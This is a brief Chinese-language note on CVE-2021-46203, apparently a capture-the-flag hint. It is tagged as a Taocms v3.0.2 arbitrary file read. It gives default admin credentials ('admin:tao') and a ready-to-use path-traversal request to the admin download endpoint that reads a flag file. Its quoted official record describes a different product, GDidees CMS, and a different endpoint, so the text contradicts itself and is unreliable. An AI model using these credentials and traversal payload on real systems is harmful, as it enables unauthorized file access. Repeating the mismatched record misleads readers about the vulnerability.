CVE-2021-46203
信息
Tags
- Taocms v3.0.2 任意文件读取
官方数据库记录
GDidees CMS v3.9.1 及更低版本被发现包含通过 /_admin/imgdownload.php 处的文件名参数下载任意文件的漏洞。
参考 arbitrary file read vulnerability · Issue #13 · taogogo/taocms
使用默认凭据 admin:tao 登陆后台之后,使用 /admin/admin.php?action=file&ctrl=download&path=../../../../../../flag 构建任意文件读取即可